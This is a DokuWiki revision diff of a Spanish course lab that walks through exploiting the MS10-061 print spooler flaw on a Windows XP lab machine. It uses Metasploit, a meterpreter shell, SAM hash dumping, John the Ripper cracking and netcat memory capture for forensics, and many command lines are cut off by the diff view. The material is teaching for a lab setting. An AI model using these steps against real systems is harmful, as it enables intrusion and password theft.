sad:t2:m4
Diferencias
Muestra las diferencias entre dos versiones de la página.
| Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
| sad:t2:m4 [2018/12/17 14:11] – José Manuel Guallar | sad:t2:m4 [2019/01/10 14:40] (actual) – José Manuel Guallar | ||
|---|---|---|---|
| Línea 1: | Línea 1: | ||
| ====== Metasploit 4 ====== | ====== Metasploit 4 ====== | ||
| - | Escenario | + | **Escenario** |
| ¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ||
| - | ¿Qué es Helix? | + | ** ¿Qué es Helix?** |
| Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | ||
| Línea 15: | Línea 15: | ||
| El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | ||
| - | Referencias | + | **Referencias** |
| * http:// | * http:// | ||
| * https:// | * https:// | ||
| - | Requisitos para hacer esta practica | + | **Requisitos para hacer esta practica** |
| * Maquina XP | * Maquina XP | ||
| * Kali | * Kali | ||
| - | Post requisitos | + | ** Post requisitos** |
| * Volatility | * Volatility | ||
| - | Que haremos en esta practica | + | **Que haremos en esta practica** |
| * Descargar Helix2008R1 | * Descargar Helix2008R1 | ||
| Línea 71: | Línea 71: | ||
| Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | ||
| - | NetBIOS es un acrónimo de sistema de entrada/ | + | **NetBIOS** es un acrónimo de sistema de entrada/ |
| Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | ||
| Línea 95: | Línea 95: | ||
| {{: | {{: | ||
| - | + | ** | |
| - | Acceso a los recursos SMB | + | Acceso a los recursos SMB** |
| < | < | ||
| Línea 120: | Línea 120: | ||
| msfconsole | msfconsole | ||
| search ms10_061 | search ms10_061 | ||
| - | use exploit/ | + | use exploit/ |
| info | info | ||
| set PAYLOAD windows/ | set PAYLOAD windows/ | ||
| Línea 177: | Línea 177: | ||
| (/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | (/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | ||
| - | netstat muestra conexiones de red. | + | **netstat** muestra conexiones de red. |
| (-n) muestra direcciones y números de puerto en forma numérica | (-n) muestra direcciones y números de puerto en forma numérica | ||
| Línea 185: | Línea 185: | ||
| (-o) muestra el identificador de proceso propietario asociado a cada conexión. | (-o) muestra el identificador de proceso propietario asociado a cada conexión. | ||
| - | 21 | + | {{: |
| - | 22 | + | |
| + | |||
| + | {{: | ||
| ===== Archivos Forenses Basicos ===== | ===== Archivos Forenses Basicos ===== | ||
| < | < | ||
| - | tasklist > forensics_tasklist.txt | + | tasklist > forense_tasklist.txt |
| - | netstat -nao > forensics_netstat.txt | + | netstat -nao > forense_netstat.txt |
| - | dir > forensics_dir.txt | + | dir > forense_dir.txt |
| exit | exit | ||
| </ | </ | ||
| Línea 202: | Línea 204: | ||
| Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | ||
| - | 23 | ||
| - | Obtener la base de datos SAM | + | {{: |
| + | ** | ||
| + | Obtener la base de datos SAM** | ||
| [[https:// | [[https:// | ||
| Línea 215: | Línea 218: | ||
| </ | </ | ||
| - | 24 | + | |
| + | {{: | ||
| < | < | ||
| Línea 222: | Línea 226: | ||
| </ | </ | ||
| - | 25 | ||
| - | Preparacion | + | {{: |
| + | |||
| + | **Preparacion | ||
| < | < | ||
| Línea 232: | Línea 237: | ||
| </ | </ | ||
| - | Se crea un directorio | + | Se crea un directorio |
| - | Se cambia el directorio en/ | + | Se cambia el directorio en/forense /ms10_061. |
| Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | ||
| - | 26 | + | {{: |
| + | ===== Memoria del XP ===== | ||
| - | Memoria del XP | ||
| Click en CD/DVD(IDE) | Click en CD/DVD(IDE) | ||
| - | Seleccionamos la ISO : Helix2008R1.iso | ||
| - | 27 | + | {{: |
| Aceptamos pinchamos en la camara | Aceptamos pinchamos en la camara | ||
| Línea 256: | Línea 261: | ||
| * puerto 8888 | * puerto 8888 | ||
| - | 28 | + | |
| + | {{: | ||
| En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | ||
| - | 29 | + | |
| + | {{: | ||
| La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | ||
| Línea 270: | Línea 277: | ||
| vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | ||
| - | 30 | + | |
| + | {{: | ||
| Descarga de los ficheros forenses en el meterpreter | Descarga de los ficheros forenses en el meterpreter | ||
| Línea 277: | Línea 285: | ||
| < | < | ||
| pwd | pwd | ||
| - | download C: | + | download C: |
| - | download C: | + | download C: |
| - | download C: | + | download C: |
| - | download C: | + | download C: |
| </ | </ | ||
| - | WRvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador | + | RvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador |
| - | 31 | + | |
| + | {{: | ||
| En otra ventana de terminal ejecutaremos un John The Ripper | En otra ventana de terminal ejecutaremos un John The Ripper | ||
| Línea 298: | Línea 307: | ||
| </ | </ | ||
| - | 32 | ||
| - | |||
| - | 33 | ||
| + | {{: | ||
| + | {{: | ||
| + | print de pantalla final que hay que entregar | ||
| + | < | ||
| + | ls -lrta | ||
| + | grep " | ||
| + | grep " | ||
| + | # Reemplazalo por tu PID | ||
| + | grep " | ||
| + | grep " | ||
| + | # Reemplaza (RvOYs3UqrJqo7a.exe) por tu programa malicioso | ||
| + | date | ||
| + | echo "Tu nombre" | ||
| + | </ | ||
sad/t2/m4.1545055890.txt.gz · Última modificación: (editor externo)
